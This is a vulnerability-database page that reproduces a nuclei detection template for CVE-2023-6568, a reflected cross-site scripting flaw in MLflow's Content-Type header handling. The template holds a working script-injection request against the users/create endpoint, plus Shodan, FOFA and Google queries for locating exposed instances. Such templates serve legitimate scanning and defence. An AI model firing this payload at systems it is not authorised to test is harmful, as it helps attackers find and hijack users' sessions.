Lucene search
K

Mlflow - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Mlflow Cross-Site Scripting vulnerability allows injection of malicious code into POST request Content-Type header, leading to execution of scripts in user's session. Sanitization needed to prevent attacks

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-6568
30 Dec 202315:01
circl
CNNVD
Mlflow Cross-Site Scripting Vulnerability
7 Dec 202300:00
cnnvd
CVE
CVE-2023-6568
7 Dec 202304:54
cve
Cvelist
CVE-2023-6568 Reflected XSS via Content-Type Header in mlflow/mlflow
7 Dec 202304:54
cvelist
Github Security Blog
Cross-site Scripting (XSS) in MLflow
7 Dec 202306:30
github
NVD
CVE-2023-6568
7 Dec 202305:15
nvd
OSV
BIT-MLFLOW-2023-6568 Reflected XSS via Content-Type Header in mlflow/mlflow
6 Mar 202410:57
osv
OSV
GHSA-VWHF-3V6X-WFF8 Cross-site Scripting (XSS) in MLflow
7 Dec 202306:30
osv
OSV
PYSEC-2023-260
7 Dec 202305:15
osv
Prion
Cross site scripting
7 Dec 202305:15
prion
Rows per page
id: CVE-2023-6568

info:
  name: Mlflow - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The vulnerability allows an attacker to inject malicious code into the Content-Type header of a POST request,
    which is then reflected back to the user without proper sanitization or escaping.
  impact: |
    Allows attackers to execute malicious scripts in the context of a user's session
  remediation: |
    Sanitize and validate user input to prevent XSS attacks
  reference:
    - https://huntr.com/bounties/816bdaaa-8153-4732-951e-b0d92fddf709
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6568
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6568
    cwe-id: CWE-79
    epss-score: 0.01649
    epss-percentile: 0.73548
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query: app="MLflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2023,mlflow,xss,vuln

http:
  - raw:
      - |
        POST /api/2.0/mlflow/users/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: <script>alert(document.domain)</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Invalid content type:"
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 400
# digest: 4a0a00473045022100e49aa94faea62f98e81c49f62a252d13f4f808d5246951a5c86410c63f8a3d0802202c04bcc4b8fa417e16199a36648c5ac96269be058134f5e8f3a3f895e91e6d97:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
CVSS 36.5
EPSS0.01649
28